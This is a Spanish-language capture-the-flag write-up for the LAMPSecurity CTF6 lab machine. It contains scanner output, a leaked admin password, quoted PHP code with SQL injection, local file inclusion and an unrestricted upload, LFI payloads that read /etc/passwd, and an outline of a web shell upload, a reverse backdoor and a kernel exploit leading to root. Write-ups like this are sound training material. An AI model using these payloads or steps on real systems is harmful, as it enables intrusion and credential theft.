Solucionario del LAMPSecurity: CTF 6 Challenge por @killr00t ganador del reto

Page 1

SOLUCIONARIO CTF6 LAMPSecurity by killr00t groupidp@gmail.com

Network Mapping

Ip Target :192.168.1.72 Port Scanning y Banderas

Tool : WhatWeb Resultado : http://192.168.1.72 [200] Meta-Author[Justin C. Klein Keane], HTTPServer[CentOS][Apache/2.2.3 (CentOS)], Apache[2.2.3] IP[192.168.1.72] PHP[5.2.6] X-Powered-By[PHP/5.2.6] Cookies[PHPSESSID] Title[CTF 6 - Widgets Inc.] fred@192.168.1.72 john@192.168.1.72 jukeane@sas.upenn.edu linda@192.168.1.72 molly@192.168.1.72 sales@192.168.1.72 toby@192.168.1.72 Country[RESERVED][ZZ] Tool : nikto Resultado : --------------------------------------------------------------------------+ Server: Apache/2.2.3 (CentOS) + Number of sections in the version string differ from those in the database, the server reports: apache/2.2.3 while the database has: 2.2.14. This may cause false positives. + Retrieved X-Powered-By header: PHP/5.2.6 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/enus/library/e8z01xdh%28VS.80%29.aspx for details. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. + OSVDB-3092: /files/: This might be interesting... + OSVDB-3092: /lib/: This might be interesting... + OSVDB-3092: /mail/: This might be interesting... + OSVDB-3092: /phpmyadmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + OSVDB-3268: /sql/: Directory indexing is enabled: /sql/ + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3268: /icons/: Directory indexing is enabled: /icons + OSVDB-3268: /manual/images/: Directory indexing is enabled: /manual/images + OSVDB-3268: /docs/: Directory indexing is enabled: /docs + OSVDB-3233: /icons/README: Apache default file found. • 3818 items checked: 16 item(s) reported on remote host

• Directorios Tool Resultado

• • • • • • • • •

/cgi-bin /files /templates /icons /docs /icons /mail /js /templates

Tool Resultado • • • • • • • •

: Dirbuster :

: nikto :

/files /lib /mail /phpmyadmin /sql /manual /docs /icons

Archivos De Interes •

/sql/db.sql INSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass'); User Pass BDD Tabla

=> => => =>

admin 25e4ee4e9229397b6b17776bfceaf8e7 => adminpass cms user

/docs/code_backup.tgz

/conf/config.ini

/logs/log.log

2009-06-28 13:06:09 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1%20from %20dual 2009-06-28 13:06:09 Problem with event select: . The used SELECT statements have a different number of columns 2009-06-28 13:06:28 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1,1%20from %20dual 2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1

2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1 2009-06-28 13:06:43 172.16.61.132 called id=4%20UNION%20select %20version,1,1,1,1,1,1%20from%20dual 2009-06-28 13:06:43 Problem with event select: . Unknown column 'version' in 'field list' 2009-06-28 13:06:52 172.16.61.132 called id=4%20UNION%20select %20version(),1,1,1,1,1,1%20from%20dual 2009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 1 2009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 1 2009-06-28 13:06:13 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,7%20from %20dual 2009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1 2009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1 2009-06-28 13:06:30 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,version() %20from%20dual 2009-06-28 13:06:30 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,version() from dual' at line 1 Nota: en este backup ya se habia identificado algunas vulnerabilidades, no sobra mirar las peticiones realizadas y asi escalar mas rapido

Identificacion de Vulnerabilidades (code_backup.tgz) File : Code :

/actions/login.php

----------------------------------------------------------------------------------------------------------------------------------------------if (isset($_POST['username']) && isset($_POST['password'])) { $sql = "select user_id from user where user_username = '" . $_POST['username'] . "'"; $query = mysql_query($sql) or die("Query error with $sql: " . mysql_error()); if ($query && mysql_num_rows($query) > 0) { //user exists $uname = mysql_fetch_object($query); $sql = "select * from user where user_id = " . $uname->user_id . " AND user_password = md5('" . $_POST['password'] . "')"; $query = mysql_query($sql) or $log->append("Query error in login $sql<hr/> " . mysql_error()); $retval = array(); if (! $query) { //no return value } else { $retval = mysql_fetch_object($query); } } if (isset($retval->user_id)) { setcookie("logged_in", 1, time()+3600); setcookie("user_id", $retval->user_id, time()+3600); setcookie("hash", $retval->user_password, time()+3600); $logged_in = 1; } } if ($logged_in) include_once('templates/logged_in.tpl'); else include_once('templates/'.$_GET['action'].'.tpl');

Vulnerabilidades : SQL Injection Variables Vulnerables : username, password Descripcion Vuln : Variables no filtradas, permitiendo interactuar con la base de datos y extraer informaci贸n se valida los parametros enviados directamente, inicialmente la variable username y si existe se valida la segunda variable password , ambas son vulnerables Vulnerabilidades Variables Vulnerables Descripcion Vuln Exploit

: : : :

Local File Include action Permite incluir por GET ficheros fuera del directorio Web /actions/login.php?action=../../../../../etc/passwd%00

File : /actions/add_event.php Code : if (! $logged_in) header("Location:index.php"); $log->append("Adding file!") or die("Couldn't append to log for some reason!"); if (isset($_POST['title'])) { if (isset($_FILES['upload'])) { $uploaddir = 'files/'; $uploadfile = $uploaddir . basename($_FILES['upload']['name']); if (! move_uploaded_file($_FILES['upload']['tmp_name'], $uploadfile)) { $log->append("Log upload problem with file array: $_FILES"); $log->append("Upload file name: $uploadfile"); $log->append("Upload file tmp name: " . $_FILES['upload']['tmp_name']); } } $sql = "insert into event set event_title='" . $_POST['title'] . "', event_body='" . addslashes($_POST['body']) . "', event_file='" . $uploadfile . "', user_id = " . $_COOKIE['user_id']; mysql_query($sql) or $log->append("Problem with insert. " . mysql_error()); } include_once('templates/'.$_GET['action'].'.tpl'); Vulnerabilidades Variables Vulnerables Descripcion Vuln Exploit

: : : :

Local File Include action Permite incluir por GET ficheros fuera del directorio Web /actions/add_event.php?action=../../../../../etc/passwd%00

Vulnerabilidades Descripcion Vuln

: :

Upload de archivos Permite subir archivos que me permiten ejecutar comandos de sistema operativo, esto se debe al no validar en el codigo ninguna extencion de archivo.

Nota: Todos los archivos tienen problemas de programaci贸, solo usare este ultimo archivo para subir la shell directamente y escalar privilegios.

Explotacion y Escalada de Privilegios File Exploit Descripcion

: /actions/add_event.php : upload de archivos : se escoge una shell php y se agrega el evento desde el logeo del CMS

LOGIN EN EL CMS

User: admin Pass: adminpass

Nota :Estos datos ya fueron recogidos desde el archivo sql encontrado.

AGREGAR EVENTOS: En esta parte hay un menu en el cual ya vimos el codigo vulnerable que nos permite subir la shell directamente

•

UPLOAD DE SHELL

Se llena el formulario y escojo mi shell (sh.php) y click en Add event

Se sube el backdoor de conexi贸n inversa para estar mas comodo al ejecutar comandos

Nos da una serie de exploits locales que podemos utilizar, utilizare : http://www.exploit-db.com/exploits/8478/ es el unico que me funciono, pero hay varios para esa version del kernel pero como digo solo me funciono este.

Nos agregamos al sistema con privilegios y entramos por el ssh

Asignamos contrase単a al usuario y conectamos por el ssh

Root Owned! salud2

Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.